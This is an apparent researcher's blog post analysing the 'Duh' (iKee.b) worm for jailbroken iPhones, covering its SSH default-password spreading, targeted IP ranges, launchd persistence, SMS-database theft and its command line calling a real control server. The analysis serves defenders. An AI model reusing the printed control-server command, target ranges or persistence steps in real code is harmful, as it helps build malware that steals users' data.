Home > iPhone > Analysis of “Duh”

Analysis of “Duh”

I just published the analysis of “Duh” also known as “iKee.b” – the latest iPhone worm. [read]

Propagation: It targets jailbroken iPhones with SSH enabled and attempt to remote login using the default iPhone password. “sshd” is responsible for scanning the network and it’s targeting pre-defined list of 3G providers in Australia, Netherlands,  Austria, Hungary and Portugal.

192.168.0.0-192.168.3.255
94.157.100.0-94.157.255.255
87.103.52.255-87.103.66.255
94.157.0.0.0-120.157.99.255
114.72.0.0-114.75.255.255
92.248.90.0-92.248.120.255
81.217.74.0-81.217.74.255
84.224.60.0-84.224.80.255
188.88.100.0-188.88.160.255
77.248.140.0-77.248.146.255
77.54.160.0-77.54.190.255
80.57.116.0-80.57.131.255
84.224.0.0-84.224.63.255

• Installation: It creates /private/var/mobile/home directory, drops “cydia.tgz” and extracts the following content:

syslog – This is a reporting bot, which runs every 5 minutes through a launchd job.  It’s a shell script which will perform the following:

• Establish remote server communication through its own http communicator “duh”

/private/var/mobile/home/duh 92.61.38.16 /xml/p.php?id=$ID

• The remote server is expected to reply where the worm will attempt to store this as a temporary file /private/var/mobile/home/.tmp
• It will mark the communication 1 if it is the first time, otherwise it’s 2.
• It then adds this information to the temporary file and saves it as /private/var/mobile/home/heh, where it will execute it as a shell script.

inst –  A malicious shell script used to install the worm. This is executed after the content of cydia.tgz is extracted.

• It checks for infection marker, to avoid re-installation. This is necessary because the worm will continuously run in background based on the launchd jobs.
• Create ID that will be used to pass communication to the master server.
• Install legitimate packages that will be used to gather and steal information
• Modify root password
• Gather important information such as iPhone OS version and SMS Message Database (sms.db).
• Compress gathered information to this format {ID}.tgz
• Establish a communication to remote server and reports back the stolen information in a base64 encoded format.

duh – This is an iPhone executable file responsible for the Worm’s bot http communication. This is where the malware name “Duh” was derived.

**Updated 11/12/2009:  A good analysis was recently published @ Fortinet’s blog. As I mentioned this worm is similar to OSX Jahlav and DNSChanger, in which the group behind mostly copy exact source code (around the internet) and uses it for their own advantage.  In this case,  Fortinet researcher found that “duh” code is similar to “htmlget.c”, which can be easily found over the internet and it is indeed  NOT malicious by itself.

I absolutely agree in this findings, however similar to “NC” (netcat utility), it could be use for good but in this specific case of the iPhone worm package, it was used to do evil 😉

curl_7.19.4-6_iphoneos_arm.deb – This is a legitimate package of Curl for iPhone, used by this worm to install the following packages:
• adv-cmds_119-5_iphoneos-arm.deb
• sqlite3_3.5.9-9_iphoneos-arm.deb

com.apple.period.plist – This is a launchd job which will execute the worm’s bot “syslog” every 5 minutes.

• Startup Entries: The worm uses LaunchDaemon to run a shell script on a specific time interval:
/System/Library/LaunchDaemons/com.apple.periodic.plist launch /private/var/mobile/home/syslog every 2000 sec. (~ 33 minutes)
/System/Library/LaunchDaemons/com.apple.period.plist launch /private/var/mobile/home/syslog every 300 sec. (5 minutes)
/System/Library/LaunchDaemons/com.apple.ksyslog.plist launch /private/var/mobile/home/sshd using “RunAtLoad” and “KeepAlive” key for continuous running.

  1. No comments yet.
  1. No trackbacks yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: